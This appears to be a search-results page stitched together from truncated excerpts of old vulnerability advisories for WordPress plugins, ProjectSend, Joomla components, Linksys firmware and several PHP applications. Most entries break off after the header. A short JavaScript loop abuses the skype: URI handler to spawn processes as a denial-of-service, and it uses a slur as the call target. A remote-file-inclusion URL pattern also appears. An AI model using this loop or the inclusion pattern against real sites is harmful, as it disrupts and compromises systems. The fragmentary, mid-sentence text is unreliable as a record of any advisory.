* Exploit Title: WordPress Plugin event-registration 6.02.02: SQL-Injection and
persistent XSS
* Discovery Date: 2016/03/13
* Public Disclosure Date: 2016/05/09
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x | https://codemetrix.net
* Vendor Homepage:
* Exploit Title: Multiple (persistent) XSS in ProjectSend
* Discovery Date: 2016/02/19
* Public Disclosure Date: 2016/03/17
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Project Homepage: http://www.projectsend.org/
* Software Link:
* Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager
* Discovery Date: 2016/01/13
* Public Disclosure Date: 2016/03/06
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Vendor Homepage: http://smartypantsplugins.com/
* Software Link:
1. Skype and Internet Explorer uri handler mechanism memory resources
consumption bug:
script
for (var x = 1; x = 666; x++)
{
popup_window = window.open('skype:happy_negro?call');
popup_window.close ();
}
/script
This will invoke many skype.exe processes and as they are not closed -
A new 1.01.04 firmware for the Linksys WAG200G seems to correct this security
problem.
Firmware 1.01.04 (04/04/2007) :
- Fixes issue with incorrect upstream/downstream transmit power display on DSL
Connection page
- Fixes issue with ATT VPN client not connecting to ATT VPN network
- Fixes
://hackberry.ath.cx
mail[AT]hackberry.ath.cx
Vulnerability:
http://[target]/?id=[REMOTEFILE]
Google dork:
[ Request us to play you a song ]
Unless otherwise demostrated, this report is fake. We have never been contacted
by this person and apart from an invalid workaround, there is also no actual
mention of how this DOS is acheived, let alone mentioning that it's based on
IIS so in principle could effect IIS itself and not only
#SolpotCrew
Community
#
# com_trade Remote File Inclusion (mosConfig_absolute_path)
#
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-com_trade.txt
#
#SolpotCrew
Community
#
# Com Multibanners Remote File Inclusion (mosConfig_absolute_path)
#
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt
#
Advisory : Cross Site Scripting in Seditio (http://www.neocrome.net)
Release Date : 24/05/2005
Last Modified : 24/05/2005
Author: Yunus Emre Yilmaz ( http://yns.zaxaz.com)
Application : Seditio v102 ( maybe older versions)
Risk : Critical
Problem :
Ldu's
Advisory : Cross Site Scripting in Boastmachine (http://boastology.com/)
Release Date : 17/05/2005
Last Modified : 17/05/2005
Author: Yunus Emre Yilmaz ( http://yns.zaxaz.com)
Application : BoastMachine v3.1 ( maybe older versions)
Risk : High
Problem : Form action
- Advisory: EJ3 TOPo Cross Site Scripting Vulnerability
- Author: Yunus Emre Yilmaz || Yns [EMAIL PROTECTED]
- Application: EJ3 TOPo ( http://ej3soft.ej3.net )
- Affected Version : v2.2.178 ( maybe older versions..)
- Risk : Critical
Details : If an attacker access /code/inc_header.php
- Advisory: PEHEPE Membership Management System Multiple Vulnerabilities
- Author: Yunus Emre Yilmaz -- mail[at]yunusemreyilmaz(dot)com
- Application: PEHEPE MemberShip Management System
(http://www.pehepe.org/UYEL#304;K3)
- Affected Version : v3 ( maybe older versions..)
- Risk : Critical
13 matches
Mail list logo